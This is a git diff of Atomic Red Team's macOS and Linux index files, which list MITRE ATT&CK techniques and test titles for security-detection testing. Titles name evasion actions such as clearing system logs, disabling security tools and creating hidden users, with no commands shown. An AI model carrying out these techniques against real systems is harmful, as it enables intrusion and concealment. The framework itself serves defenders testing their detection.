-- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
-  - Atomic Test #2: At - Schedule a job [linux]
-
 # impact
 - T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -776,8 +815,10 @@
 - T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.002 Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1657 Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1491.001 Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.001 Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1531 Account Access Removal](../../T1531/T1531.md)
   - Atomic Test #4: Change User Password via passwd [macos, linux]
@@ -813,6 +854,7 @@
 - T1566.002 Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1566.001 Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md
index 9725aef8b0..7a87c2a6a8 100644
--- a/atomics/Indexes/Indexes-Markdown/macos-index.md
+++ b/atomics/Indexes/Indexes-Markdown/macos-index.md
@@ -1,53 +1,39 @@
 # macOS Atomic Tests by ATT&CK Tactic & Technique
 # defense-evasion
+- T1055.011 Process Injection: Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.011 Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.011 Signed Binary Proxy Execution: Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.003 Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.012 File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
-  - Atomic Test #1: chmod - Change file or folder mode (numeric mode) [linux, macos]
-  - Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [linux, macos]
-  - Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [linux, macos]
-  - Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [linux, macos]
-  - Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
-  - Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
-  - Atomic Test #7: chown - Change file or folder mode ownership only [linux, macos]
-  - Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
-  - Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
-  - Atomic Test #11: Chmod through c script [macos, linux]
-  - Atomic Test #13: Chown through c script [macos, linux]
+- T1216.001 Signed Script Proxy Execution: Pubprn [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1006 Direct Volume Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.013 Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
-  - Atomic Test #1: Sudo usage [macos, linux]
-  - Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
-  - Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
+- T1036.007 Masquerading: Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.001 Pre-OS Boot: System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
   - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
 - T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.009 Impair Defenses: Safe Boot Mode [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
   - Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
-- [T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md)
-  - Atomic Test #1: rm -rf [macos, linux]
-  - Atomic Test #3: Delete log files using built-in log utility [macos]
-  - Atomic Test #4: Truncate system log files via truncate utility [macos]
-  - Atomic Test #6: Delete log files via cat utility by appending /dev/null or /dev/zero [macos]
-  - Atomic Test #8: System log file deletion via find utility [macos]
-  - Atomic Test #9: Overwrite macOS system log via echo utility [macos]
-  - Atomic Test #11: Real-time system log clearance/deletion [macos]
-  - Atomic Test #12: Delete system log files via unlink utility [macos]
-  - Atomic Test #14: Delete system log files using shred utility [macos]
-  - Atomic Test #15: Delete system log files using srm utility [macos]
-  - Atomic Test #16: Delete system log files using OSAScript [macos]
-  - Atomic Test #17: Delete system log files using Applescript [macos]
+- T1218.004 Signed Binary Proxy Execution: InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.008 Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1553.001 Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md)
-  - Atomic Test #1: Gatekeeper Bypass [macos]
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1036.009 Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.007 Signed Binary Proxy Execution: Msiexec [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
   - Atomic Test #1: Clear Bash history (rm) [linux, macos]
@@ -56,6 +42,7 @@
   - Atomic Test #6: Clear history of a bunch of shells [linux, macos]
   - Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
   - Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
+- T1202 Indirect Command Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
   - Atomic Test #3: Base64 decoding with Python [linux, macos]
   - Atomic Test #4: Base64 decoding with Perl [linux, macos]
@@ -64,6 +51,7 @@
   - Atomic Test #9: Linux Base64 Encoded Shebang in CLI [linux, macos]
   - Atomic Test #10: XOR decoding and command execution using Python [linux, macos]
 - T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.008 Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md)
   - Atomic Test #3: Copy and Delete Mailbox Data on macOS [macos]
@@ -78,44 +66,67 @@
   - Atomic Test #4: Modify file timestamps using reference file [linux, macos]
   - Atomic Test #9: MacOS - Timestomp Date Modified [macos]
 - T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1480.002 Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.011 Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1497.003 Time Based Evasion](../../T1497.003/T1497.003.md)
   - Atomic Test #1: Delay execution with ping [linux, macos]
+- T1218.003 Signed Binary Proxy Execution: CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.002 Impair Defenses: Disable Windows Event Logging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.002 Signed Binary Proxy Execution: Control Panel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1562.004 Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1218.015 Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1207 Rogue Domain Controller [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1553.006 Subvert Trust Controls: Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1112 Modify Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
   - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos]
   - Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos]
+- T1484.001 Domain Policy Modification: Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
   - Atomic Test #3: Enable Guest Account on macOS [macos]
-- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
-  - Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
+- T1070.001 Indicator Removal on Host: Clear Windows Event Logs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
-  - Atomic Test #1: Make and modify binary from C source [macos, linux]
-  - Atomic Test #3: Set a SetUID flag on file [macos, linux]
-  - Atomic Test #5: Set a SetGID flag on file [macos, linux]
+- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.008 Signed Binary Proxy Execution: Odbcconf [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1562.006 Impair Defenses: Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.003 Use Alternate Authentication Material: Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.004 Masquerading: Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1647 Plist File Modification](../../T1647/T1647.md)
-  - Atomic Test #1: Plist Modification [macos]
+- T1055.004 Process Injection: Asynchronous Procedure Call [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.002 Process Injection: Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1562.010 Impair Defenses: Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.005 Signed Binary Proxy Execution: Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.001 Access Token Manipulation: Token Impersonation/Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.012 LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.002 Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md)
   - Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
   - Atomic Test #2: Create Hidden User using IsHidden option [macos]
+- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.003 Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md)
   - Atomic Test #1: Disable history collection [linux, macos]
   - Atomic Test #3: Mac HISTCONTROL [macos, linux]
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.004 Access Token Manipulation: Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.001 Signed Binary Proxy Execution: Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.005 Indicator Removal on Host: Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
   - Atomic Test #6: Disable Carbon Black Response [macos]
   - Atomic Test #7: Disable LittleSnitch [macos]
@@ -126,18 +137,22 @@
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1564.009 Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.012 Process Injection: Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
   - Atomic Test #1: Decode base64 Data into Script [macos, linux]
 - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.014 Polymorphic Code [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.005 Access Token Manipulation: SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.010 Signed Binary Proxy Execution: Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.003 Masquerading: Rename System Utilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
   - Atomic Test #4: Install root CA on macOS [macos]
 - [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
@@ -145,23 +160,36 @@
   - Atomic Test #4: CC compile [linux, macos]
   - Atomic Test #5: Go compile [linux, macos]
 - T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1656 Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127.002 ClickOnce [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
   - Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [linux, macos]
   - Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos]
+- T1221 Template Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
   - Atomic Test #3: Binary simply packed by UPX [macos]
   - Atomic Test #4: Binary packed by UPX, with modified headers [macos]
 - T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md)
-  - Atomic Test #1: Space After Filename (Manual) [macos]
-  - Atomic Test #2: Space After Filename [macos, linux]
-- T1548.006 TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.002 Use Alternate Authentication Material: Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1216.002 SyncAppvPublishingServer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.007 Obfuscated Files or Information: Dynamic API Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.015 Process Injection: ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1220 XSL Script Processing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
   - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
   - Atomic Test #2: Mac Hidden file [macos]
@@ -169,98 +197,227 @@
   - Atomic Test #6: Hide a Directory [macos]
   - Atomic Test #7: Show all hidden files [macos]
 - T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.004 Hide Artifacts: NTFS File Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.001 Process Injection: Dynamic-link Library Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1216 Signed Script Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
   - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
   - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
   - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.014 MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.010 Process Argument Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# privilege-escalation
+- T1055.011 Process Injection: Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.013 Event Triggered Execution: PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
